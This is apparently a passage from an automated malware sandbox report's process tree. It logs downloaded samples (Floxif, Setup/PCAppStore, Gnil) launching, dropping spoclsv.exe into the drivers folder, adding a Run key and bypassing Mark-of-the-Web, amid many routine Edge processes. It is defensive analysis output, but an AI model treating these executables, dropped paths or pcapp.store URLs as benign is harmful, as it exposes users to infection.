C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 424
3⤵
- Program crash
PID:1932

C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 424
3⤵
- Program crash
PID:2572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
2⤵
PID:3172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5948 /prefetch:8
2⤵
PID:1228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
2⤵
PID:4216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
2⤵
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
2⤵
PID:1596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
2⤵
PID:2980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
2⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6532 /prefetch:8
2⤵
PID:4844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5892 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1868 /prefetch:1
2⤵
PID:3128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
2⤵
PID:2160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7012 /prefetch:1
2⤵
PID:1516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
2⤵
PID:1488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
2⤵
PID:4524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
2⤵
PID:3464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
2⤵
PID:1028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
2⤵
PID:4820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6784 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
2⤵
PID:4940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6152 /prefetch:8
2⤵
PID:1468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7528 /prefetch:8
2⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2096

C:\Users\Admin\Downloads\Setup.exe
"C:\Users\Admin\Downloads\Setup.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://pcapp.store/installing.php?guid=C9038F8C-1E1B-4144-A72A-756D47BBFF27X&winver=22000&version=fa.1091q&nocache=20240803183609.240&_fcid=1722710142968491
3⤵
PID:4196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff0db83cb8,0x7fff0db83cc8,0x7fff0db83cd8
4⤵
PID:1460

C:\Users\Admin\AppData\Local\Temp\nsd9C7.tmp
"C:\Users\Admin\AppData\Local\Temp\nsd9C7.tmp" /internal 1722710142968491 /force
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Users\Admin\PCAppStore\PcAppStore.exe
"C:\Users\Admin\PCAppStore\PcAppStore.exe" /init default
4⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4796

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
.\nwjs\NW_store.exe .\ui\.
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2928

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
C:\Users\Admin\PCAppStore\nwjs\NW_store.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" /prefetch:4 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" --monitor-self-argument=/prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\pc_app_store\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" --annotation=plat=Win64 --annotation=prod=pc_app_store --annotation=ver=0.1.0 --initial-client-data=0x26c,0x270,0x274,0x268,0x278,0x7ffefa19a960,0x7ffefa19a970,0x7ffefa19a980
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5088

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
C:\Users\Admin\PCAppStore\nwjs\NW_store.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\pc_app_store\User Data" /prefetch:4 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\pc_app_store\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=pc_app_store --annotation=ver=0.1.0 --initial-client-data=0x1d8,0x1dc,0x1e0,0x148,0x1e4,0x7ff685148a60,0x7ff685148a70,0x7ff685148a80
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2892

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1728 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:2
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1248

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --mojo-platform-channel-handle=1744 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:3
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3020

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=2168 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:8
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5132

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --nwjs --extension-process --no-appcompat-clear --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\PCAppStore\nwjs\gen" --no-zygote --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3056 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:2
6⤵
- Executes dropped EXE
- Loads dropped DLL
- NTFS ADS
PID:5656

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4252 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:8
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5152

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=3712 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:8
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6328

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=5016 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:8
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6364

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --mojo-platform-channel-handle=4904 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:8
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6456

C:\Users\Admin\PCAppStore\nwjs\NW_store.exe
"C:\Users\Admin\PCAppStore\nwjs\NW_store.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\pc_app_store\User Data" --nwapp-path=".\ui\." --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=5016 --field-trial-handle=1732,i,4863221215349950605,10492083228504642009,262144 --variations-seed-version /prefetch:8
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:6708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mobi-gamez.com/play/parking_plot?c=6283282216&p_key=FATNAT01
5⤵
PID:6628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff0db83cb8,0x7fff0db83cc8,0x7fff0db83cd8
6⤵
PID:6648

C:\Users\Admin\PCAppStore\Watchdog.exe
"C:\Users\Admin\PCAppStore\Watchdog.exe" /guid=C9038F8C-1E1B-4144-A72A-756D47BBFF27X /rid=20240803183635.693240807937 /ver=fa.1091q
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 /prefetch:8
2⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1000

C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:880

C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:1
2⤵
PID:3712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7516 /prefetch:8
2⤵
PID:3312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
2⤵
PID:2428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
2⤵
PID:1560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
2⤵
PID:3028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:8
2⤵
PID:1940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5636 /prefetch:8
2⤵
PID:5720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8076 /prefetch:1
2⤵
PID:6700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7924 /prefetch:1
2⤵
PID:1376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
2⤵
PID:6204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
2⤵
PID:1656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7968 /prefetch:1
2⤵
PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
2⤵
PID:7060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8600 /prefetch:1
2⤵
PID:2944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8548 /prefetch:1
2⤵
PID:5772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1
2⤵
PID:2344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8312 /prefetch:8
2⤵
- NTFS ADS
PID:7060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
